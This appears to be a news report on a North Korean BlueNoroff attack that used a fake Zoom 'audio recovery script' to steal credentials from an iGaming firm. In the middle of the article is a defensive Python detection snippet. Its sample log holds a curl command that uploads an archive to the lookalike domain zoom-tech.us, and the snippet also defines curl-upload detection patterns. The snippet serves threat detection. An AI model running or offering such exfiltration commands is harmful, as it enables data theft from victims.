A Canadian iGaming company has reportedly fallen victim to a targeted cyberattack carried out by BlueNoroff — a subunit of North Korea’s Lazarus Group. The breach occurred on May 28 during what appeared to be a routine Zoom call with a known business contact.

During the call, an employee was convinced to run a so-called “audio recovery script” to resolve technical issues. The file, in fact, contained malware that initiated unauthorized data collection and system infiltration.

Fake Domains and Social Engineering

The attackers used convincing impersonations of both Zoom technical support and trusted business contacts. They also relied on fake domains such as zoom-tech[.]us to build credibility. Once the malicious code was executed, it began harvesting system data, browser credentials — particularly from crypto-friendly browsers like Brave — and Telegram session information.

The stolen data was exfiltrated through remote shell commands issued with curl, which also gave the attackers deeper control of the infected device and a means of maintaining persistence.
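As an added defensive illustration (not code from the article or from any party it names), the following Python flags two of the signals described above in constructed telemetry: DNS queries for Zoom lookalike domains such as zoom-tech[.]us, and curl commands that upload data when launched from a shell, as a dropped "recovery script" would. The log format, hostnames and allow-list are assumptions.

```python
import re

# Constructed sample telemetry (not from the article): DNS queries and
# process-creation events from one workstation on the day of the call.
DNS_LOG = [
    "2025-05-28T14:02:11Z host=ws-17 query=us02web.zoom.us",
    "2025-05-28T14:03:40Z host=ws-17 query=zoom-tech.us",
    "2025-05-28T14:03:41Z host=ws-17 query=api.telegram.org",
]
PROC_LOG = [
    "2025-05-28T14:03:38Z host=ws-17 parent=Terminal cmd=/bin/sh /Users/a/Downloads/zoom_audio_fix.sh",
    "2025-05-28T14:03:45Z host=ws-17 parent=sh cmd=curl -s -X POST --data-binary @/tmp/c.tgz https://zoom-tech.us/api/up",
    "2025-05-28T14:10:02Z host=ws-17 parent=zsh cmd=curl -sL https://example.org/readme.txt",
]

# Assumption: the organisation's allow-list of genuine Zoom domains.
LEGIT_ZOOM_SUFFIXES = ("zoom.us", "zoom.com")
SHELLS = {"sh", "bash", "zsh"}
# curl options that attach a request body, i.e. send local data outbound.
UPLOAD_FLAGS = re.compile(r"(?:^|\s)(?:-d|--data(?:-\w+)?|-F|--form|-T|--upload-file)(?=\s|=)")

def is_zoom_lookalike(domain: str) -> bool:
    """True for hostnames that borrow the 'zoom' brand outside the allow-list."""
    d = domain.lower().rstrip(".")
    if any(d == s or d.endswith("." + s) for s in LEGIT_ZOOM_SUFFIXES):
        return False
    return "zoom" in d

def is_curl_upload(cmd: str) -> bool:
    """True when the command is curl carrying a request body."""
    argv = cmd.split()
    return bool(argv) and argv[0].rsplit("/", 1)[-1] == "curl" and bool(UPLOAD_FLAGS.search(cmd))

def lookalike_queries(lines):
    """Return DNS query names that imitate Zoom but are not genuine Zoom hosts."""
    hits = re.findall(r"query=(\S+)", "\n".join(lines))
    return [q for q in hits if is_zoom_lookalike(q)]

def shell_curl_uploads(lines):
    """Return (destination host, command) pairs for curl uploads launched from a
    shell: the pattern of a dropped script pushing collected data out."""
    found = []
    for line in lines:
        m = re.search(r"parent=(\S+) cmd=(.*)$", line)
        if m and m.group(1) in SHELLS and is_curl_upload(m.group(2)):
            url = re.search(r"https?://([^/\s]+)", m.group(2))
            found.append((url.group(1) if url else "", m.group(2)))
    return found
```

Correlating a lookalike query with a shell-spawned curl upload to the same host within a short window, as both functions report here for zoom-tech.us, is the alert a SOC would want rather than either signal alone.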

Financial Motives and Past Targets

BlueNoroff is known for targeting financial institutions and cryptocurrency firms as part of broader revenue-generation campaigns linked to the North Korean regime. The group has previously been tied to high-profile breaches, including attacks on Bybit and the Ronin Network linked to Axie Infinity.

Investigators suggest that the group’s latest focus on iGaming operators highlights a growing overlap between gambling and crypto-related threat vectors.

Source: https://gbhackers.com/bluenoroff-hackers-exploit-zoom-app-to-deploy-infostealer-malware/